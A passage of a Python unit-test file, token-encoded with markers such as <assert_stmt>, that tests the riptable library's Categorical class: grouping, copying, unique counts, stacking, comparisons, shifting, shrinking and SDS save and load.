<block_start>c=Categorical([1.0 1.0 2.0] [1.0 2.0] invalid=2.0)<assert_stmt>c._fa[2]<eq>2<line_sep>num=c.sum(arange(1 4)).col_0[0]<assert_stmt>num<eq>3<block_end><def_stmt>test_get_groupings self<block_start>g,f,n=(FastArray([2 3 0 4 1]) FastArray([0 0 2 4]) FastArray([0 2 2 1]) )<line_sep>c=Categorical(['b' 'c' 'a' 'a' 'b'] base_index=0)<line_sep>gg=c.get_groupings()<line_sep>group=gg['iGroup']<line_sep>first=gg['iFirstGroup']<line_sep>ncount=gg['nCountGroup']<assert_stmt>bool(np.all(g<eq>group))<assert_stmt>bool(np.all(f<eq>first))<assert_stmt>bool(np.all(n<eq>ncount))<line_sep>c=Categorical(['b' 'c' 'a' 'a' 'b'] base_index=1)<line_sep>gg=c.get_groupings()<line_sep>group=gg['iGroup']<line_sep>first=gg['iFirstGroup']<line_sep>ncount=gg['nCountGroup']<assert_stmt>bool(np.all(g<eq>group))<assert_stmt>bool(np.all(f<eq>first))<assert_stmt>bool(np.all(n<eq>ncount))<block_end><def_stmt>test_repr self# just make sure no error for coverage
<block_start>c=Categorical(['a' 'b' 'c'])<line_sep>r=c.__repr__()<assert_stmt>r f"Representation should not be empty for Categorical '{c}'."<assert_stmt>isinstance(r str)<block_end><def_stmt>test_copy_deep self<block_start>c=Categorical(['a' 'b' 'c'])<line_sep>d=c.copy(deep=<true>)<line_sep>d[0]='b'<assert_stmt>c[0]<eq>'a'<assert_stmt>c._fa[0]<eq>1<assert_stmt>d[0]<eq>'b'<assert_stmt>d._fa[0]<eq>2<block_end><def_stmt>test_copy_new_filter self<block_start>a=Categorical('A B A B A B'.split())<line_sep>b=Categorical('B A B A B A'.split())<line_sep>c=a.copy()<line_sep>f=c<eq>'A'<line_sep>c[f]=b[f]<assert_stmt>c[0]<eq>'B'<assert_stmt>c[1]<eq>'B'<assert_stmt>a[0]<eq>'A'<assert_stmt>a[1]<eq>'B'<assert_stmt>b[0]<eq>'B'<assert_stmt>b[1]<eq>'A'<block_end><def_stmt>test_setitem_tuple self<block_start>c=Categorical([arange(5) arange(5)])<line_sep>c[0]=(1 1)<assert_stmt>c._fa[0]<eq>2<block_end><def_stmt>test_nunique self<block_start>codes=np.random.randint(0 3 1000)<line_sep>d={0:'All' 1:'ManualAndQuasi' 2:'Manual'}<line_sep>c=Categorical(codes d)<line_sep>n=c.nunique()<assert_stmt>n<eq>3<assert_stmt>len(c.unique())<eq>3<line_sep>codes=np.ones(1000 dtype=np.int32)<line_sep>c=Categorical(codes d)<line_sep>n=c.nunique()<assert_stmt>n<eq>1<assert_stmt>len(c.unique())<eq>1<line_sep>codes=arange(5)<line_sep>c=Categorical(codes d)<line_sep>n=c.nunique()<assert_stmt>n<eq>5<assert_stmt>len(c.unique())<eq>5<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'd'] ['a' 'b' 'c' 'd'])<line_sep>n=c.nunique()<assert_stmt>n<eq>4<assert_stmt>len(c.unique())<eq>4<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'd'] ['a' 'b' 'c' 'd'] base_index=0)<line_sep>n=c.nunique()<assert_stmt>n<eq>4<assert_stmt>len(c.unique())<eq>4<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'd'])<line_sep>c[2]=0<line_sep>n=c.nunique()<assert_stmt>n<eq>3<assert_stmt>len(c.unique())<eq>3<assert_stmt>c.unique_count<eq>4<line_sep>c=Categorical([arange(3) np.array(['a' 'b' 'c'])])<line_sep>c[0]=0<line_sep>n=c.nunique()<assert_stmt>n<eq>2<assert_stmt>c.unique_count<eq>3<line_sep># The following assertion is moved to it's own unit pytest along with an xfail.
# found below and named test_multikey_categorical_unique.
# assert len(c.unique()) == 2
<block_end><def_stmt>test_unique self<block_start>l=list('xyyz')<line_sep>c,c_sub=rt.Cat(l) rt.Cat(l[:3])<line_sep>assert_array_equal(c.unique() c.category_array 'mismatch between unique categories and category array')<line_sep>assert_array_equal(c.unique() c.category_array.unique() 'mismatch between unique categories and expanded category array')<assert_stmt>c.nunique()<eq>3 'mismatch in number of unique categories'<line_sep>assert_array_equal(c[:3].unique() c_sub.category_array 'mismatch between unique categories and category array with sliced categorical')<line_sep>assert_array_equal(c[:3].unique() c_sub.category_array.unique() 'mismatch between unique categories and expanded category array with sliced categorical')<assert_stmt>c[:3].nunique()<eq>2 'mismatch in number of unique categories with sliced categorical'<block_end><def_stmt>test_scalar_unique self<block_start>idx=ones(100)<line_sep>cats=700_000.0<line_sep>c=Categorical(idx cats from_matlab=<true>)<assert_stmt>isinstance(c Categorical)<assert_stmt>c.unique_count<eq>1<block_end><def_stmt>test_stack_multikey self# TODO pytest parameterize the strings
<block_start>strs=FA(np.random.choice(['aaaaa' 'b' 'ccc'] 23))<line_sep>flts=np.random.choice([7.14 6.66 5.03] 23)<line_sep>c1=Categorical([strs flts])<line_sep>c1_str=Categorical(strs)<line_sep>c1_flt=Categorical(flts)<line_sep>strs2=FA(np.random.choice(['b' 'aaaaa'] 17))<line_sep>flts2=np.random.choice([5.03 7.14] 17)<line_sep>c2=Categorical([strs2 flts2])<line_sep>c2_str=Categorical(strs2)<line_sep>c2_flt=Categorical(flts2)<line_sep>fa_str=hstack([strs strs2])<line_sep>fa_flt=hstack([flts flts2])<line_sep># TODO add assertions for multikey Categoricals
c_str=Categorical(fa_str)<line_sep>c_flt=Categorical(fa_flt)<line_sep># TODO move these into SDS save / load tests
paths=[r'riptable/tests/temp/ds1.sds' r'riptable/tests/temp/ds2.sds']<line_sep>ds1=Dataset({'mkcat':c1 'strcat':c1_str 'fltcat':c1_flt 'strfa':strs 'fltfa':flts })<line_sep>ds2=Dataset({'mkcat':c2 'strcat':c2_str 'fltcat':c2_flt 'strfa':strs2 'fltfa':flts2 })<line_sep>ds1.save(paths[0])<line_sep>ds2.save(paths[1])<line_sep># normal dataset hstack
hstack_ds=hstack([ds1 ds2])<assert_stmt>isinstance(hstack_ds Dataset)<line_sep># dataset hstack from load
stack_load_ds=load_sds(paths stack=<true>)<assert_stmt>isinstance(stack_load_ds PDataset)<line_sep># multikey cat hstack
hstack_mkcats=hstack([c1 c2])<assert_stmt>isinstance(hstack_mkcats Categorical)<line_sep># normal array hstack
hstack_strs=hstack([strs strs2])<line_sep>hstack_flts=hstack([flts flts2])<line_sep># single cat hstack
hstack_cstrs=hstack([c1_str c2_str])<assert_stmt>isinstance(hstack_cstrs Categorical)<line_sep>hstack_cflts=hstack([c1_flt c2_flt])<assert_stmt>isinstance(hstack_cflts Categorical)<assert_stmt>bool(np.all(hstack_strs<eq>hstack_cstrs.expand_array))<assert_stmt>bool(np.all(hstack_flts<eq>hstack_cflts.expand_array))<line_sep>mktup=[*hstack_mkcats.category_dict.values()]<assert_stmt>bool(np.all(hstack_mkcats._expand_array(mktup[0])<eq>fa_str))<assert_stmt>bool(np.all(hstack_mkcats._expand_array(mktup[1])<eq>fa_flt))<line_sep>mktup2=[*stack_load_ds.mkcat.category_dict.values()]<assert_stmt>bool(np.all(stack_load_ds.mkcat._expand_array(mktup2[0])<eq>fa_str))<assert_stmt>bool(np.all(stack_load_ds.mkcat._expand_array(mktup2[1])<eq>fa_flt))<line_sep>mktup3=[*hstack_ds.mkcat.category_dict.values()]<assert_stmt>bool(np.all(hstack_ds.mkcat._expand_array(mktup3[0])<eq>fa_str))<assert_stmt>bool(np.all(hstack_ds.mkcat._expand_array(mktup3[1])<eq>fa_flt))<for_stmt>p paths<block_start>os.remove(p)<block_end><block_end># TO TEST:
# regular python Enum
# apply / apply_dataset, etc.
# def test_sort_copy(self):
# c = Categorical(np.random.choice(['a','b','c'], 15))
# d = c.sort_copy()
# c = Categorical([np.random.choice(['a','b','c'], 15), np.random.randint(0,3,15)])
# d = c.sort_copy()
# ----------------------------------------------------------
# def test_str_repr(self):
# '''
# SJK: We're still in the early stages of deciding how to print out or summarize a categorical in the workspace.
# Comment it out if repr or str changes, and I will fix up.
# '''
# # no break
# input = ['b', 'b', 'b', 'a', 'b', 'b']
# str_string = ', '.join(input)
# repr_string = "Categorical(["+str_string+"])"
# c = Categorical(input)
# self.assertEqual(str(c),str_string, msg=f"__str__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# self.assertEqual(c.__repr__(),repr_string, msg=f"__repr__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# # add break
# slice_size = 5
# input = ['b', 'b', 'b', 'a', 'b', 'b', 'b', 'b', 'b', 'a', 'b', 'b', 'c', 'c']
# str_string = ', '.join(input[:slice_size]+['...']+input[-slice_size:])
# repr_string = "Categorical(["+str_string+"])"
# c = Categorical(input)
# self.assertEqual(str(c),str_string, msg=f"__str__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# self.assertEqual(c.__repr__(),repr_string, msg=f"__repr__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
<def_stmt>test_as_string_array self# SJK 10/4/2018 - as string array now returns bytes OR unicode (whatever type the string based categorical is holding)
<block_start>f=np.array([b'b' b'b' b'b' b'a' b'b' b'b'])<line_sep>c=Categorical(f)<line_sep>is_equal=bool(np.all(c.as_string_array<eq>f))<assert_stmt>isinstance(c.as_string_array FastArray) f"Categorical did not return a fastarray in as_string_array"<assert_stmt>(is_equal) f"Categorical returned an incorrect string array {c.as_string_array} view of itself. Expected {f}"<block_end><def_stmt>test_indexing_numeric self<block_start>c=Cat([1.1 2.2 3.3])<line_sep>result=c['2.2']<assert_stmt>np.all(result<eq>[<false> <true> <false>])<block_end><def_stmt>test_fill_forward self<block_start>fa=FA([1. np.nan 1.])<line_sep>c=Cat([1 1 1])<line_sep>c.fill_forward(fa inplace=<true>)<assert_stmt>np.all(fa<eq>[1. 1. 1.])<block_end># TODO pytest parameterize `compare_func_names`
<def_stmt>test_all_compare_tests self# with scalar
# cat(unicode)
<block_start>i=2<line_sep>c1=Categorical(three_ints)<if_stmt>ShowCompareInfo<block_start>print("Categorical:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("Compare unicode to int scalar: 2")<block_end>self.compare_cat_test(c1 compare_func_names int_success i)<line_sep># cat(unicode) / unicode, unicode list
i="AMZN\u2082"<line_sep>c3=Categorical(three_unicode)<if_stmt>ShowCompareInfo<block_start>print("Categorical:" c3)<block_end><if_stmt>ShowCompareInfo<block_start>print("Compare unicode cat to unicode string")<block_end>self.compare_cat_test(c3 compare_func_names int_success i)<if_stmt>ShowCompareInfo<block_start>print("Compare to list of unicode string")<block_end>self.compare_cat_test(c3 compare_func_names int_success [i])<if_stmt>ShowCompareInfo<block_start>print("Compare to a numpy array of unicode string")<block_end>self.compare_cat_test(c3 compare_func_names int_success np.array([i]))<line_sep># cat(bytes) / bytes, bytes list
i=b'b'<line_sep>c4=Categorical(three_bytes)<if_stmt>ShowCompareInfo<block_start>print("Categorical:" c4)<block_end><if_stmt>ShowCompareInfo<block_start>print("Compare bytes cat to bytestring")<block_end>self.compare_cat_test(c4 compare_func_names int_success i)<if_stmt>ShowCompareInfo<block_start>print("Compare to bytestring in list")<block_end>self.compare_cat_test(c4 compare_func_names int_success [i])<if_stmt>ShowCompareInfo<block_start>print("Compare to bytestring in numpy array")<block_end>self.compare_cat_test(c4 compare_func_names int_success np.array([i]))<line_sep># cat(bytes) / unicode, unicode list
i="b"<line_sep>c5=Categorical(three_bytes)<if_stmt>ShowCompareInfo<block_start>print("Categorical:" c5)<block_end><if_stmt>ShowCompareInfo<block_start>print("Compare bytes cat to unicode string")<block_end>self.compare_cat_test(c5 compare_func_names int_success i)<if_stmt>ShowCompareInfo<block_start>print("Compare to unicode string in list")<block_end>self.compare_cat_test(c5 compare_func_names int_success [i])<if_stmt>ShowCompareInfo<block_start>print("Compare to unicode string in numpy array")<block_end>self.compare_cat_test(c5 compare_func_names int_success np.array([i]))<line_sep># equal categoricals (same dictionary)
# cat(bytes) / cat(bytes)
<if_stmt>ShowCompareInfo<block_start>print("Compare two equal categoricals:")<block_end><if_stmt>ShowCompareInfo<block_start>print("Both from byte lists:")<block_end>c1=Categorical(three_bytes)<line_sep>c2=Categorical(three_bytes)<if_stmt>ShowCompareInfo<block_start>print("cat1:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("cat2:" c2)<block_end>self.compare_cat_test(c1 compare_func_names same_success c2)<line_sep># cat(unicode) / cat(unicode)
<if_stmt>ShowCompareInfo<block_start>print("Both from unicode lists:")<block_end>c1=Categorical(three_unicode)<line_sep>c2=Categorical(three_unicode)<if_stmt>ShowCompareInfo<block_start>print("cat1:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("cat2:" c2)<block_end>self.compare_cat_test(c1 compare_func_names same_success c2)<line_sep># cat(unicode) / cat(bytes)
<if_stmt>ShowCompareInfo<block_start>print("unicode/bytes list")<block_end>c1=Categorical(["a" "b" "c"])<line_sep>c2=Categorical(three_bytes)<if_stmt>ShowCompareInfo<block_start>print("cat1:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("cat2:" c2)<block_end>self.compare_cat_test(c1 compare_func_names same_success c2)<line_sep># unequal categoricals (same dictionary)
# cat(bytes) / cat(bytes)
<if_stmt>ShowCompareInfo<block_start>print("Compare two unequal categoricals (same dict):")<block_end><if_stmt>ShowCompareInfo<block_start>print("both bytes")<block_end>c1=Categorical([0 1 0] three_bytes)<line_sep>c2=Categorical([2 1 2] three_bytes)<if_stmt>ShowCompareInfo<block_start>print("cat1:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("cat2:" c2)<block_end>self.compare_cat_test(c1 compare_func_names diff_success c2)<line_sep># cat(unicode) / cat(unicode)
<if_stmt>ShowCompareInfo<block_start>print("both unicode")<block_end>c1=Categorical([0 1 0] three_unicode)<line_sep>c2=Categorical([2 1 2] three_unicode)<if_stmt>ShowCompareInfo<block_start>print("cat1:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("cat2:" c2)<block_end>self.compare_cat_test(c1 compare_func_names diff_success c2)<line_sep>## cat(bytes) / int list (matching)
# if ShowCompareInfo: print("Compare categorical to matching int list")
# if ShowCompareInfo: print("bytes")
# i = [1,2,3]
# c1 = Categorical(three_bytes)
# self.compare_cat_test(c1,compare_func_names,same_success,i)
## cat(unicode) / int list (matching)
# if ShowCompareInfo: print("unicode")
# c1 = Categorical(three_unicode)
# self.compare_cat_test(c1,compare_func_names,same_success,i)
## cat(bytes) / int list (non-matching)
# if ShowCompareInfo: print("Compare categorical to non-matching int list")
# if ShowCompareInfo: print("bytes")
# i = [3,2,1]
# c1 = Categorical(three_bytes)
# self.compare_cat_test(c1,compare_func_names,int_success,i)
## cat(unicode) / int list(non-matching)
# if ShowCompareInfo: print("unicode")
# c1 = Categorical(three_unicode)
# self.compare_cat_test(c1,compare_func_names,int_success,i)
<block_end># def cat_slicing(self):
# three_unicode =FA(["AAPL\u2080","AMZN\u2082","IBM\u2081"])
# three_bytes = FA([b'a',b'b',b'c'])
# num_rows=8
# idx_size=15
# get_item_dicts = {
# "single_slices" : {
# ":2" : slice(None,2,None),
# "-2:": slice(-2,None,None),
# "2:5": slice(2,5,None),
# "5:" : slice(5,None,None),
# ":" : slice(None,None,None)
# },
# "bool_arrays" : {
# "python_bool" : [True, False, True, False, False, True, True, True, False, True, False, False, True, False, True],
# "numpy_bool" : np.array([True, False, True, False, False, True, True, True, False, True, False, False, True, False, True])
# },
# "int_indices" : { "int_idx_size"+str(idx_size) : np.random.randint(low=0,high=num_rows,size=idx_size) for idx_size in range(1,num_rows) }
# }
# failures = 0
# idx_list = np.random.randint(low=0,high=8,size=15)
# s_list = np.array([b'adam',b'bob',b'charlie',b'david',b'edward',b'frank',b'greg',b'harold'])
# c = Categorical(idx_list, s_list)
# for key, test_dict in get_item_dicts.items():
# print("\n\n"+key)
# for call_str, val in test_dict.items():
# success = s_list[idx_list[val]]
# if np.all(c[val].as_string_array == success):
# message = "success"
# else:
# message = "failure"
# failures += 1
# print(call_str, message)
# print("Tests complete with",failures,"errors")
# return c
@pytest.mark.xfail(reason="RIP-215 - lead to inconsistent Categorical state; please add hypothesis tests when resolved.")<def_stmt>test_category_add self<block_start>cat=Categorical(list("bbcdebc"))<line_sep>e="a"<line_sep>cat.category_add(e)<assert_stmt>e<in>cat "expect the added category to be added to the Categorical"<assert_stmt>e<in>cat._categories "expect the added category to be added to the Categorical._categories"<assert_stmt>e<in>cat.category_array "expect the added category to be added to the Categorical.category_array"<assert_stmt>e<in>cat.category_dict "expect the added category to be added to the Categorical.category_dict"<block_end>@pytest.mark.xfail(reason="RIP-215 - lead to inconsistent Categorical state; please add hypothesis tests when resolved.")<def_stmt>test_category_remove self<block_start>cat=Categorical(list("bbcdebc"))<line_sep>e=cat[0]<line_sep>cat.category_remove(e)<assert_stmt>e<not><in>cat "expect the removed category to be removed from the Categorical"<assert_stmt>e<not><in>cat._categories "expect the removed category to be removed from the Categorical._categories"<assert_stmt>(e<not><in>cat.category_array) "expect the removed category to be removed from the Categorical.category_array"<assert_stmt>(e<not><in>cat.category_dict) "expect the removed category to be removed from the Categorical.category_dict"<block_end># TODO move this to testing utils
<def_stmt>compare_cat_test self cat compare_func_names success_bools i<block_start><for_stmt>fname,success zip(compare_func_names success_bools)<block_start>func=getattr(cat fname)<line_sep>result=func(i)<assert_stmt>np.all(result<eq>success) f'fail on {fname} {cat} {i}'<if_stmt>ShowCompareInfo<block_start><if_stmt>np.all(result<eq>success)<block_start>message="succeeded"<block_end><else_stmt><block_start>message="failed"<block_end>print(fname message)<block_end><block_end><block_end><def_stmt>test_duplicated self<block_start>result=Cat([2 3 2] list('qwery')).duplicated()<assert_stmt>np.all(result<eq>FA([<false> <false> <true>]))<block_end><def_stmt>test_cat_copy self# add deep copy for enum, single, multi
<block_start>x=arange(6 dtype=uint16)<floordiv>2<line_sep>c=Cat(x {0:'Run' 1:'Stop' 2:'Start'} dtype=uint16)<line_sep>c[1]='Start'<line_sep>a=c.copy()<line_sep>d=a[:5]<line_sep>a[1]='Run'<line_sep>b=a[:5]<assert_stmt>a._fa[1]<eq>0<assert_stmt>b._fa[1]<eq>0<assert_stmt>c._fa[1]<eq>2<assert_stmt>d._fa[1]<eq>0<block_end><def_stmt>test_assinglekey self<block_start>c=Cat([1 2 1 2 1 2] {'Sunny':1 'Thunderstorms':2})<line_sep># insert bad value
c._fa[3]=17<line_sep>c1=c.as_singlekey(ordered=<false>)<line_sep>c2=c.as_singlekey(ordered=<true>)<assert_stmt>np.all(c1.expand_array<eq>c2.expand_array)<line_sep>c=Cat([-1 -2 -1 -2 -1 -2] {'Sunny':-1 'Thunderstorms':-2})<line_sep>c._fa[3]=17<line_sep>c3=c.as_singlekey(ordered=<false>)<line_sep>c2=c.as_singlekey(ordered=<true>)<assert_stmt>np.all(c1.expand_array<eq>c2.expand_array)<assert_stmt>np.all(c3.expand_array<eq>c2.expand_array)<block_end><block_end># Cannot use the pytest.mark.parameterize decorator within classes that inherit from unittest.TestCase.
# Will need to migrate for unittest to pytest and fold the following categorical tests into Categorical_Test.
@pytest.mark.parametrize("categoricals" [# Categorical constructed from python list data
pytest.param([Categorical(data)<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])] id="cat_with_list_values" ) # Categorical constructed from numpy array
pytest.param([Categorical(np.array(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])] id="cat_with_np_array_values" ) # Categorical constructred from riptable fast array
pytest.param([Categorical(rt.FastArray(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])] id="cat_with_rt_fastarray_values" ) # failed test cases
pytest.param([Categorical(data)<for>data get_categorical_data_factory_method(CategoryMode.MultiKey)] marks=[pytest.mark.xfail(reason="RIP-410 - Bug for MultiKey Categoricals: AttributeError: 'Categorical' object has no attribute 'ismultikey_labels'")] id="cat_with_tuple_values" ) ] )<def_stmt>test_one_hot_encode categoricals<block_start><for_stmt>categorical categoricals<block_start>col_names,encoded_arrays=categorical.one_hot_encode()<line_sep>category_array=categorical.category_array.astype('U')<line_sep># Test 1.1 The col_names are the same as the category array.
<assert_stmt><not>set(category_array).symmetric_difference(set(col_names)) (f"The column names should be the same as the names in the category array" f"category array {category_array}\ncolumn names {col_names}" )<line_sep># Test 1.2 The encoded_arrays dtypes are consistent with one another.
encoded_arrays_dtypes=set([fa.dtype<for>fa encoded_arrays])<assert_stmt>(len(encoded_arrays_dtypes)<eq>1) f"Encoded array dtypes should be consistent, got {encoded_arrays_dtypes}"<line_sep># todo for each category, assert the mask of the categorical is in the encoded_arrays
<block_end><block_end>@pytest.mark.parametrize("categoricals" [# Categorical constructed from python list data
pytest.param([Categorical(data)<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_list_values" ) # Categorical constructed from numpy array
pytest.param([Categorical(np.array(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_np_array_values" ) # Categorical constructred from riptable fast array
pytest.param([Categorical(rt.FastArray(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_rt_fastarray_values" ) ] )<def_stmt>test_shift_cat categoricals# todo Handle numeric invalid types for categoricals with values other than strings.
<block_start>filtered_name=rt.rt_enum.FILTERED_LONG_NAME.encode("utf-8")<for_stmt>categorical categoricals<block_start>cat_len=len(categorical)<for_stmt>i range(-cat_len+1 cat_len)# exhaustive shift of all Categorical values.
# shift the categorical i-places
<block_start>shift_cat=categorical.shift_cat(i)<line_sep># The category array should remain unchanged.
assert_array_equal(shift_cat.category_array categorical.category_array)<line_sep># The underlying FastArray should have the items shifted to the i-th position.
<if_stmt>i<g>0# shift forwards case
<block_start>assert_array_equal(shift_cat._fa[i:] categorical._fa[:-i] f"FastArray items should be shifted by {i} postions." )<line_sep># The Categorical should have the values shifted to the i-th position.
cat_values,shift_cat_values=(categorical.expand_array shift_cat.expand_array )<line_sep>assert_array_equal(shift_cat_values[i:] cat_values[:-i] f"Categorical values should be shifted by {i} positions." )<line_sep># The underlying FastArray should have the first i-items to be the invalid value.
# The Categorical values should have the first i-items be the filtered or invalid name.
# Need to handle other invalid values and other Categorical base indexing.
assert_array_equal(shift_cat_values[:i] np.full(i filtered_name) f"Shifted Categorical values up to {i}-th position should be '{filtered_name}'." )<line_sep>assert_array_equal(shift_cat._fa[:i] np.zeros(i) f"Shifted Categorical underlying FastArray items up to {i}-th position should be the invalid value 0." )<block_end><elif_stmt>i<l>0# shifted backwards case
<block_start>i=abs(i)# slicing arithmetic based on positional value of i
assert_array_equal(shift_cat._fa[:cat_len-i] categorical._fa[i:] f"FastArray items should be shifted by -{i} postions." )<line_sep>cat_values,shift_cat_values=(categorical.expand_array shift_cat.expand_array )<line_sep>assert_array_equal(shift_cat_values[:cat_len-i] cat_values[i:] f"Categorical values should be shifted by -{i} positions." )<line_sep>assert_array_equal(shift_cat_values[-i:] np.full(i filtered_name) f"Shifted Categorical values up to -{i}-th position should be '{filtered_name}'." )<line_sep>assert_array_equal(shift_cat._fa[-i:] np.zeros(i) f"Shifted Categorical underlying FastArray items up to -{i}-th position should be the invalid value 0." )<block_end><elif_stmt>i<eq>0# zero-th shift case
# test for equality
<block_start>assert_array_equal(shift_cat.category_array categorical.category_array)<line_sep>assert_array_equal(shift_cat._fa categorical._fa)<line_sep>cat_values,shift_cat_values=(categorical.expand_array shift_cat.expand_array )<line_sep>assert_array_equal(shift_cat_values cat_values)<block_end><block_end># shift overflow for backward and forward case up to two values
<for_stmt>i list(range(-cat_len-2 -cat_len))+list(range(cat_len cat_len+2))<block_start>shift_cat=categorical.shift_cat(i)<line_sep>assert_array_equal(shift_cat.category_array categorical.category_array)<line_sep># Investigate possible bug with expanding Categorical values. E.g.:
# given:
# Categorical([a, a, a, a, a, a, a, a, a, a]) Length: 10
# FastArray([1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int8) Base Index: 1
# FastArray([b'a'], dtype='|S1') Unique count: 1
# shifted categorical
# Categorical([Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered]) Length: 10
# FastArray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int8) Base Index: 1
# FastArray([b'a'], dtype='|S1') Unique count: 1
# got
# E x: FastArray([b'Filtered', b'Filtered', b'Filtered', b'Filtered',
# E b'Filtered', b'Filtered', b'Filtered', b'Filtered',
# E b'Filtered', b'a'], dtype='|S8')
# E y: array([b'Filtered', b'Filtered', b'Filtered', b'Filtered', b'Filtered',
# E b'Filtered', b'Filtered', b'Filtered', b'Filtered', b'Filtered'],
# E dtype='|S8')
# Expected all values to be b'Filtered', but saw b'a'.
# todo assert_array_equal(shift_cat_values, np.full(cat_len, filtered_name), f"Overflow shifted Categorical values. All values are expected to be invalid '{filtered_name}'.")
assert_array_equal(shift_cat._fa np.zeros(cat_len) f"Overflow shifted Categorical underlying FastArray items. All values are expected to be invalid value 0." )<block_end><block_end><block_end>@pytest.mark.parametrize(# TODO - add base 0 and base 1 indexing w/ expectations
"categoricals" [# Categorical constructed from python list data
pytest.param([Categorical(data)<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_list_values" ) # Categorical constructed from numpy array
pytest.param([Categorical(np.array(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_np_array_values" ) # Categorical constructred from riptable fast array
pytest.param([Categorical(rt.FastArray(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_rt_fastarray_values" ) ] )@pytest.mark.parametrize("misc" [<none> "INVALID"])# TODO - add numeric values
@pytest.mark.parametrize("inplace" [<false> <true>])<def_stmt>test_shrink categoricals misc inplace<block_start><for_stmt>categorical categoricals<block_start>cat=categorical.copy(deep=<true>)# deep copy so test data remains unchanged with inplace shrinks
# Test 1 Shrink with empty values.
# Shrink to empty categories.
shrink_cat=cat.shrink([] misc=misc inplace=inplace)<line_sep># Type is preserved after shrinking.
<assert_stmt>isinstance(shrink_cat Categorical) "shrink_cat should be a Categorical."<if_stmt>misc<is><none># For base index 1 Categorical, the underlying FastArray should be all zeros.
<block_start>assert_array_equal(shrink_cat._fa np.zeros(len(cat)))<line_sep># The Categorical categories should be empty.
expected_category_array=np.empty(0)<line_sep>assert_array_equal(shrink_cat.category_array expected_category_array f"Category dictionary values should be empty." )<for_stmt>arr shrink_cat.category_dict.values()<block_start>assert_array_equal(arr expected_category_array f"Category dictionary values should be empty." )<block_end># TODO expanding shrink categorical does not return original types invalid value; instead it returns nans
# N.B, when shrinking, the category array type changes to float64
# E x: FastArray([nan])
# E y: array([b'Filtered'], dtype='|S8')
# assert_array_equal(shrink_cat.expand_array, np.full(len(cat), filtered_name), f"Given empty values, shrink categorical values should all be invalid '{filtered_name}'.")
<block_end><else_stmt># single categories being the specified misc
# TODO - consider any constraints to assert on for the dtype?
# The invalid value based on the dtype: e.g., for U32 its -2147483646
# assert_array_equal(shrink_cat._fa, InvalidValuesForDtype)
# assert_array_equal(shrink_cat.expand_array, InvalidValuesForDtypeExpanded)
# The categories should only contain the misc value.
<block_start>expected_category_array=np.array(misc)<line_sep>assert_array_equal(shrink_cat.category_array expected_category_array f"Category array should only contain the '{misc}' category." )<for_stmt>arr shrink_cat.category_dict.values()<block_start>assert_array_equal(arr expected_category_array f"Category dictionary values should only contain the '{misc}' category." )<block_end><block_end># Test 2 Shrink with same categories
cat=categorical.copy(deep=<true>)<line_sep># Shrink to all the same categories.
shrink_cat=cat.shrink(cat.category_array misc=misc inplace=inplace)<line_sep># Type is preserved after shrinking.
<assert_stmt>isinstance(shrink_cat Categorical) "shrink_cat should be a Categorical."<if_stmt>misc<is><none># TODO handle the misc not None case
<block_start>shrink_cat_values,cat_values=shrink_cat.expand_array cat.expand_array<line_sep>assert_array_equal(shrink_cat_values cat_values)<line_sep>assert_array_equal(shrink_cat._fa cat._fa)<line_sep>assert_array_equal(shrink_cat.category_array cat.category_array)<for_stmt>arr,expected_arr zip(shrink_cat.category_dict.values() cat.category_dict.values())<block_start>assert_array_equal(arr expected_arr)<block_end><block_end># TODO Test 3 Shrink with subset of categories
cat=categorical.copy(deep=<true>)<line_sep># Shrink to all the same categories.
n=int(len(cat)/2)<line_sep>shrink_cat=cat.shrink(cat.category_array[:n] misc=misc inplace=inplace)<line_sep># Type is preserved after shrinking.
<assert_stmt>isinstance(shrink_cat Categorical) "shrink_cat should be a Categorical."<block_end><block_end>@pytest.mark.parametrize("categoricals" [# TODO - test categorical construction using numpy and riptable arrays as a separate test
# Categorical constructed from python list data
pytest.param([Categorical(data)<for>data get_categorical_data_factory_method()] id="cat_with_list_values" ) # Categorical constructed from numpy array
pytest.param([Categorical(np.array(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])] id="cat_with_np_array_values" ) # Categorical constructred from riptable fast array
pytest.param([Categorical(rt.FastArray(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])] id="cat_with_rt_fastarray_values" ) ] )<def_stmt>test_sds categoricals tmpdir<block_start>dir=tmpdir.mkdir("test_categorical_sds")<for_stmt>i,cat enumerate(categoricals)<block_start>name="categorical_"+str(i)<line_sep>p=str(dir.join(name))<line_sep>save_sds(p cat)<line_sep>cat2=load_sds(p)<line_sep># Test 1 Saved and loaded categoricals should be the same.
# TODO vary the meta version optional parameter when calling Categorical._load_from_sds_meta_data
<assert_stmt>isinstance(cat2 Categorical)<line_sep>assert_array_equal(cat2._fa cat._fa)<if_stmt><not>cat.ismultikey# MultiKey Categorical's do not support category_array operation
